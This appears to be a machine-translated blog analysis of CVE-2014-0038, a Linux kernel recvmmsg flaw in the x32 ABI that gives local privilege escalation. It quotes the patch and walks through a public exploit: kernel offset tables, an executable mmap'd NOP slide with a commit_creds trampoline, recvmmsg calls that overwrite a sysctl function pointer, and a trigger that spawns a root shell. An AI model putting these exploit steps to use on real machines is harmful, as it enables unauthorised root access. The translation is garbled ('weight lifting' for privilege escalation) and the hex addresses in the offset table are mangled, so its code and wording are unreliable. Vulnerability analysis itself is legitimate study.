Seteuid0 · 2014/11/07 16:08

Keywords: CVE-2014-0038, Kernel Vulnerability, POC, Exploit code, local Escalation, escalation, Exploit, CVE Analysis, Privilege Escalation, CVE, kernel Vulnerability

Introduction to the

Solar announced the CVE (CVE-2014-0038) in the OSS-SEC mailing list on January 31, 2014. This CVE refers to the X32 ABI. The X32 ABI was incorporated in kernel Linux3.4, but distributions such as RHEL/ Fedora do not have this compilation option enabled, so it is not affected by the CVE. Ubuntu has this option enabled in recent versions, so it is affected by this CVE. The X32 ABI is more efficient with 32-bit addresses in 64-bit environments, see Resources or Google for more information.

Vulnerability principle

Check the patch corresponding to the CVE first

#! c++ diff --git a/net/compat.c b/net/compat.c index dd32e34.. F50161f 100644 - a/net/compat. C +++ b/net/compat. C @@-780,21 +780,16 @@asmlinkage long compat_sys_recvmmsg(int fd, compat_sys_recvmmsg) struct compat_mmsghdr __user *mmsg, if (flags & MSG_CMSG_COMPAT) return -EINVAL; - if (COMPAT_USE_64BIT_TIME) - return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, - flags | MSG_CMSG_COMPAT, - (struct timespec *) timeout); - if (timeout == NULL) return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, NULL); - if (get_compat_timespec(&ktspec, timeout)) + if (compat_get_timespec(&ktspec, timeout)) return -EFAULT; datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, &ktspec); - if (datagrams > 0 && put_compat_timespec(&ktspec, timeout)) + if (datagrams > 0 && compat_put_timespec(&ktspec, timeout)) datagrams = -EFAULT; return datagrams;Copy the code

This CVE is introduced because the user space input is not copied, and the timeout pointer is passed directly to __sys_recVMMSG for processing.

Just like the modification in patch, timetout is processed by calling compat_get_timespec if the timeout parameter is not empty, and this function will copy the timeout in user space.

#! c++ int compat_get_timespec(struct timespec *ts, const void __user *uts) { if (COMPAT_USE_64BIT_TIME) return copy_from_user(ts, uts, sizeof *ts) ? -EFAULT : 0; else return get_compat_timespec(ts, uts); }Copy the code

So what happens when you pass in a timeout? In __sys_recVMmsg.

#! c++ /* * Linux recvmmsg interface */ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct timespec *timeout) { int fput_needed, err, datagrams; struct socket *sock; struct mmsghdr __user *entry; struct compat_mmsghdr __user *compat_entry; struct msghdr msg_sys; struct timespec end_time; if (timeout && poll_select_set_timeout(&end_time, timeout->tv_sec, timeout->tv_nsec)) return -EINVAL; datagrams = 0; sock = sockfd_lookup_light(fd, &err, &fput_needed); if (! sock) return err; err = sock_error(sock->sk); if (err) goto out_put; entry = mmsg; compat_entry = (struct compat_mmsghdr __user *)mmsg; while (datagrams < vlen) { /* * No need to ask LSM for more than the first datagram. */ if (MSG_CMSG_COMPAT & flags) { err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); if (err < 0) break; err = __put_user(err, &compat_entry->msg_len); ++compat_entry; } else { err = ___sys_recvmsg(sock, (struct msghdr __user *)entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); if (err < 0) break; err = put_user(err, &entry->msg_len); ++entry; } if (err) break; ++datagrams; /* MSG_WAITFORONE turns on MSG_DONTWAIT after one packet */ if (flags & MSG_WAITFORONE) flags |= MSG_DONTWAIT; if (timeout) { ktime_get_ts(timeout); *timeout = timespec_sub(end_time, *timeout); if (timeout->tv_sec < 0) { timeout->tv_sec = timeout->tv_nsec = 0; break; } /* Timeout, return less than vlen datagrams */ if (timeout->tv_nsec == 0 && timeout->tv_sec == 0) break; } /* Out of band data, return right away */ if (msg_sys.msg_flags & MSG_OOB) break; } out_put: fput_light(sock->file, fput_needed); if (err == 0) return datagrams; if (datagrams ! = 0) { /* * We may return less entries than requested (vlen) if the * sock is non block and there aren't enough datagrams... */ if (err ! = -EAGAIN) { /* * ... or if recvmsg returns an error after we * received some datagrams, where we record the * error to return on the next call or if the * app asks about it using getsockopt(SO_ERROR). */ sock->sk->sk_err = -err; } return datagrams; } return err; }Copy the code

In the function

#! c++ poll_select_set_timeout(&end_time, timeout->tv_sec, timeout->tv_nsec))Copy the code

. Set an end time. Then the following code guarantees timeout>=0

#! c++ if (timeout) { ktime_get_ts(timeout); *timeout = timespec_sub(end_time, *timeout); if (timeout->tv_sec < 0) { timeout->tv_sec = timeout->tv_nsec = 0; break; } /* Timeout, return less than vlen datagrams */ if (timeout->tv_nsec == 0 && timeout->tv_sec == 0) break; }Copy the code

In addition, poll_select_set_timeout checks timespec, so tv_sec and tv_nsec of a timeout passed in must conform to the timeout structure, that is, the address context must conform to the specified content when constructing an address.

#! c++ /* * Returns true if the timespec is norm, false if denorm: */ static inline bool timespec_valid(const struct timespec *ts) { /* Dates before 1970 are bogus */ if (ts->tv_sec < 0) return false; /* Can't have more nanoseconds then a second */ if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC) return false; return true; }Copy the code

Include/Linux /time.h: #define NSEC_PER_SEC 1000000000L.

By now we know that as long as we skillfully use the specificity of timeout, we can construct a specific address by constructing a specific timeout structure, so that we can realize the weight lifting operation.

Using code analysis

Currently, there are two exploit codes on exploit-DB, with basically the same utilization principles but different structures of the selected construction addresses. In this paper, www.exploit-db.com/exploits/31… The exploit code in.

This exploit code and many other kernel weight using roughly the same way, through the use of leaky system calls to a specific kernel function address modification into user space address, and then will be the right code is mapped to the corresponding address of the user space, so that when a user calls to the specific function is modified, the kernel code, execute the relevant rights. The following instructions should be detailed using code.

As you all know, on 64-bit systems, due to the large number of addresses, the kernel space and user space can only be distinguished by whether the higher bits are 0 or 1. The kernel space address range is 0xFFFF FFFF to 0xFFFF 8000 0000 0000. The user space address range is 0x0000 7FFFF FFFF ~0x0000 0000 0000. So just use the timeout process to turn a high 1 into a 0.

The exploit code exploits the net_CTL_permissions function pointer of the net_SYscTL_root structure. Since the addresses of different functions in different kernel versions are different, a structure is defined to store the function addresses of different kernel versions, so that weight lifting can be done on multiple kernels with specific kernel addresses.

#! c++ struct offset { char *kernel_version; unsigned long dest; // net_sysctl_root + 96 unsigned long original_value; // net_ctl_permissions unsigned long prepare_kernel_cred; unsigned long commit_creds; }; struct offset offsets[] = { {" 3.11.0-15 - generic ", 0 96, 0 xffffffff816d4ff0 xffffffff81cdf400 +, 0 xffffffff8108afb0, 0 xffffffff8108ace0}, / / Ubuntu 13.10 {3.11.0-12 - "generic", 0 xffffffff81cdf3a0, 0 xffffffff816d32a0, 0 xffffffff8108b010, 0 xffffffff8108ad40}, / / Ubuntu 13.10 {3.8.0-19 - "generic", 0 xffffffff81cc7940, 0 xffffffff816a7f40, 0 xffffffff810847c0, 0 xffffffff81084500}, // Ubuntu 13.04 {NULL,0,0,0,0}};Copy the code

The Exploit program starts by using this function mapping structure to check the current kernel and obtains the function address Pointers offsets[I] to be used.

Then align the page with the address of net_CTL_permissons, and set the higher 6*4 bits to 0, which is the user-space address.

#! c++ mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); mmapped &= 0x000000ffffffffff;Copy the code

Then use this address as the base address to map a memory space and set the map area to be writable and executable. The slide is constructed by filling the map area with 0x90. Then copy the weights to the map area.

#! c++ mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(mmapped == -1) { perror("mmap()"); exit(-1); } memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) ! = 0) { perror("mprotect()"); exit(-1);Copy the code

Override code is very traditional kernel override code that modifies process CREDS data structures by calling commit_CREds. Note that commit_CREds and prepare_kernel_CREd are also obtained from kernel address information specific to the kernel version, so they are also contained in the offset structure and need to be set for the specific kernel version.

#! c++ static int __attribute__((regparm(3))) getroot(void *head, void * table) { commit_creds(prepare_kernel_cred(0)); return -1; } void __attribute__((regparm(3))) trampoline() { asm("mov $getroot, %rax; call *%rax;" ); }Copy the code

Now that the ready environment is in place, you need to call the buggy __NR_recvmmsg to change the address. Change the value of the permissions pointer in net_syscTL_root.

#! c++ static struct ctl_table_root net_sysctl_root = { .lookup = net_ctl_header_lookup, .permissions = net_ctl_permissions, };Copy the code

Ctl_table_root is defined as:

#! c++ struct ctl_table_root { struct ctl_table_set default_set; struct ctl_table_set *(*lookup)(struct ctl_table_root *root, struct nsproxy *namespaces); int (*permissions)(struct ctl_table_header *head, struct ctl_table *table); };Copy the code

The Permissions position is net_sysctl_root+96 by calculating ctl_table_root.

Use the system call timeout to change the upper 6*4 bits of the.permissions value from 1 to 0.

#! c++ for(i=0; i < 3 ; i++) { udp(i); retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); if(! retval) { fprintf(stderr,"\nrecvmmsg() failed\n"); }}Copy the code

By using the system call three times, which in turn will 0 XFF * * * * * * * * * * * * * *, 0 x00ff * * * * * * * * * * * *, 0 x0000 FF * * * * * * * * * * FF is modified to 00.

After execution, the permissions program successfully points to the user space populated with the permissions code. Note: the processing must start from the high position here. Since each program is processed in parallel, it is impossible to guarantee the complete match between timeout value and sleep value, and since tv_sec of timeout value >=0, the borrowing can be avoided by processing from the high position successively. This is also one of the conditions for selecting the structure.

Since 0xFF *3 = 765, it takes 13 minutes for the weighting program to convert the address value that permissions points to to the user-space address value.

All things are ready except the east wind. As long as the user calls the modified net_syscTL_root ->permissions.

#! c++ void trigger() { open("/proc/sys/net/core/somaxconn",O_RDONLY); if(getuid() ! = 0) { fprintf(stderr,"not root, ya blew it! \n"); exit(-1); } fprintf(stderr,"w00p w00p! \n"); system("/bin/sh -i"); }Copy the code

At this point, the CVE analysis is completed. It has to be said that although the principle of the CVE is relatively simple, but the realization of the final use of the method is very clever, worth learning.

reference

1, en.wikipedia.org/wiki/X32_AB…